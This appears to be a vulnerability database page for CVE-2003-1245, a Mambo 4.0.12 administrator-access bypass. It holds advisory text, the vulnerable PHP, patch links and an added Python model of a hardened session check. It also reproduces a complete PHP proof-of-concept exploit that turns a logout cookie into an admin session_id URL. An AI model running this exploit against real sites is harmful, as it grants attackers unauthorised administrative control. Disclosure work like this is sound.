CVE-2003-1245
CVSS 10.0
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:25
NMCOE    

[Original] index2.php in Mambo 4.0.12 allows remote attackers to gain administrator access via a URL request where session_id is set to the MD5 hash of a session cookie.


[CNNVD] Mambo Site Server Cookie Validation Vulnerability (CNNVD-200312-380)


        Mambo Site Server is a free, open-source web content management tool written in PHP.
        Mambo Site Server does not sufficiently validate cookie-based authentication information when authorizing access; a remote attacker can exploit this to reach the administration pages with a crafted cookie.
        The /administrator/index2.php script is vulnerable: anyone who knows a session_id stored in the session table can access the Mambo server with administrator privileges.
        Under the usual PHP design, a cookie that has just been set is not visible until the page is reloaded. Mambo SiteServer contains the following code:
        setcookie("sessioncookie", "$sessionID");
        if ($HTTP_COOKIE_VARS["sessioncookie"]!="") {
         $query="INSERT into ".$dbprefix."session set
        session_id='$cryptSessionID', guest='', userid='$uid',
        usertype='$usertype', gid='$gid', username='$username'";
         $database->openConnectionNoReturn($query);
        }
        As we can see, Mambo SiteServer checks whether the cookie is set before inserting the session ID into the session table; if it is not set, no session ID is inserted and the administrator directory cannot be reached. However, looking at the code in SessionCookie.php, we see that a session ID is inserted as soon as you log out:
        $current_time = time();
        if ($HTTP_COOKIE_VARS["sessioncookie"]==""){
         $randnum=getSessionID1();
         ...
         $cryptrandnum=md5($randnum);
         ...
         setcookie("sessioncookie", "$randnum");
         $guest=1;
         $query="INSERT into ".$dbprefix."session SET username='',
        time=$current_time, session_id='$cryptrandnum', guest=$guest";
         $database->openConnectionNoReturn($query);
        }
        Therefore, if a cookie such as the following is sent to the browser (for example when someone has just logged out of the Mambo server):
        sessioncookie=nh54OQIZb8ybaA2CNNdU1046102063
        an attacker can MD5-hash this value and request the /administrator/index2.php script with that session ID, and will be treated as logged in as administrator:
        /administrator/index2.php?session_id=0ebda5bbba49dc226b4ed8fc801f1d98

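As an added illustration (not code from this page or from Mambo), the following Python models the session table described above in an in-memory SQLite database, with the guest row that the logout handler writes and an administrator row, and then contrasts a lookup that matches on session_id alone, as the advisory says index2.php effectively does, with a hardened lookup that derives the id from the presented cookie, requires a non-guest administrator row and rejects stale sessions. The column names follow the INSERT statements quoted above; the table name, the sample cookie values and the hardening rules are assumptions.

```python
import hashlib
import sqlite3

# Session table modelled on the INSERT statements in the advisory (constructed).
SCHEMA = """
CREATE TABLE mos_session (
    session_id TEXT PRIMARY KEY,
    username   TEXT,
    userid     INTEGER,
    usertype   TEXT,
    gid        INTEGER,
    guest      INTEGER,
    time       INTEGER
)
"""

def md5_hex(value: str) -> str:
    """session_id is stored as md5() of the raw cookie value, as in SessionCookie.php."""
    return hashlib.md5(value.encode()).hexdigest()

def build_table(now: int) -> sqlite3.Connection:
    """Constructed sample data: one guest row written by logout, one admin row."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    rows = [
        # logout handler: guest=1, empty username, session_id = md5(cookie value)
        (md5_hex("guestcookie1046102063"), "", 0, "", 0, 1, now),
        # administrator login: guest=0, usertype 'administrator'
        (md5_hex("admincookie1046100000"), "admin", 62, "administrator", 25, 0, now),
    ]
    db.executemany("INSERT INTO mos_session VALUES (?,?,?,?,?,?,?)", rows)
    return db

def vulnerable_lookup(db: sqlite3.Connection, session_id: str) -> bool:
    """Matches on session_id only, the behaviour the advisory describes:
    any row, including the guest row written at logout, is accepted."""
    row = db.execute("SELECT 1 FROM mos_session WHERE session_id=?",
                     (session_id,)).fetchone()
    return row is not None

def hardened_lookup(db: sqlite3.Connection, cookie_value: str, now: int,
                    ttl: int = 900) -> bool:
    """Assumed fix: hash the cookie the browser presents (never a URL parameter),
    require a non-guest administrator row, and reject sessions older than ttl."""
    row = db.execute(
        "SELECT 1 FROM mos_session WHERE session_id=? AND guest=0 "
        "AND usertype='administrator' AND time > ?",
        (md5_hex(cookie_value), now - ttl)).fetchone()
    return row is not None
```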

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1245
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1245
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-380
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/6926
(PATCH)  BID  6926
http://xforce.iss.net/xforce/xfdb/11398
(UNKNOWN)  XF  mambo-sessionid-gain-privileges(11398)
http://archives.neohapsis.com/archives/bugtraq/2003-02/0302.html
(VENDOR_ADVISORY)  BUGTRAQ  20030224 Mambo SiteServer exploit gains administrative privileges

- Vulnerability information

Mambo Site Server Cookie Validation Vulnerability
Critical  Access validation error
2003-12-31 00:00:00 2006-01-17 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        Mambo
        -----
        The vendor has released an upgrade that fixes this security issue. Download the upgrade to 4.0.12 RC3 or a later version from the vendor's homepage:
        Mambo Mambo Site Server 4.0.12 RC2:
        Mambo Site Server Upgrade Mambo Site Server 4.0.12 RC3

        http://prdownloads.sourceforge.net/mambo/MamboV4.0.12-RC3.tar.gz?download

        Mambo Site Server Patch MamboV4.0.12-RC3-patch.tar.gz

        http://prdownloads.sourceforge.net/mambo/MamboV4.0.12-RC3-patch.tar.gz?download

        Mambo Upgrade Mambo Server 4.0.12

        http://sourceforge.net/project/showfiles.php?group_id=25577

- Vulnerability information (22281)

Mambo Site Server 4.0.12 RC2 Cookie Validation Vulnerability (EDBID:22281)
php webapps
2003-02-24 Verified
0 Simen Bergo
N/A
source: http://www.securityfocus.com/bid/6926/info

Mambo Site Server may grant access without sufficiently validating cookie based authentication credentials. It has been reported that Mambo will accept a user cookie sent by the site as an administrative credential. To exploit this issue, the attacker must receive a cookie (such as the one issued during logout) and then use MD5 to encode their session ID in the cookie. The attacker may then access administrative pages using this cookie.

This issue was reported in Mambo Site Server 4.0.12 RC2. Earlier versions may also be affected.

<?php
/*
   mamboexp.php - Mambo 4.0.12 RC2 exploit - Proof of concept
   Copyright (C) 2003  Simen Bergo (sbergo@thesource.no)
   This program is free software; you can redistribute it and/or
   modify it under the terms of the GNU General Public License
   as published by the Free Software Foundation; either version 2 of
   the License or (at your option) any later version.
   This program is distributed in the hope that it will be
   useful, but WITHOUT ANY WARRANTY; without even the implied warranty
   of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.
   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
*/
/*
   The problem is that Mambo Site Server does not check whether or not
   the sessionid is created by the administrator login, or any other
   part of the website.
   This program will first connect to /index.php?option=logout which
   hands us a cookie. Then we will md5() encrypt this cookie and "login"
   at the administrator section.
*/

    # Check if form was submitted
    if (isset ($_POST['submit'])) {
        # Connect to server (fsockopen takes $errno/$errstr by reference itself;
        # the original call-time "&" is a parse error on current PHP)
        $handle = fsockopen ($_POST['hostname'], 80, $errno, $errstr);
        # Halt processing if we were unable to connect
        if (!$handle) { die ("Unable to connect to <b>{$_POST['hostname']}</b>"); }
        else {
            # Get the webpage which will give us the cookie (Host header on one line)
            fputs ($handle, "GET /" . trim($_POST['maindir'], "\x5c \x2f") . "/index.php?option=logout HTTP/1.0\nHost: {$_POST['hostname']}\n\n");
            # Loop through the contents
            $buffer = "";
            while (!feof ($handle)) {
                $buffer .= fgets ($handle, 2000);
            }
            # Create an array with each line as a separate value
            $arr = explode ("\n", $buffer);
            # Loop through the array looking for the cookie
            foreach ($arr as $value) {
                # If we have found the cookie, proceed (case-insensitive match;
                # the original used eregi(), which no longer exists)
                if (stripos ($value, "Set-Cookie: sessioncookie=") !== false) {
                    # Explode again, to sort out the sessionid
                    $var = explode ("=", $value);
                    # Now that we have all the information we need, we can redirect
                    header ("Location: http://{$_POST['hostname']}/" .
                            trim($_POST['admdir'], "\x5c \x2f") . "/index2.php?session_id=" . md5(trim($var[1])));
                }
            }
        }
    }
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  <table border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td width="120" height="30">Hostname</td>
      <td width="280" height="30"><input type="text" name="hostname" size="30" value="www.mamboserver.com"/></td>
    </tr>
    <tr>
      <td width="120" height="30">Main directory</td>
      <td width="280" height="30"><input type="text" name="maindir" size="30" value=""/></td>
    </tr>
    <tr>
      <td width="120" height="30">Admin directory</td>
      <td width="280" height="30"><input type="text" name="admdir" size="30" value="administrator"/></td>
    </tr>
    <tr>
      <td width="120" height="30"></td>
      <td width="280" height="30"><input type="submit" value="Gain access" name="submit"/> <input type="reset" value="Reset"/></td>
    </tr>
  </table>
</form>


- Vulnerability information

7494
Mambo Open Source MD5 Hash Session ID Privilege Escalation

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-02-24 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete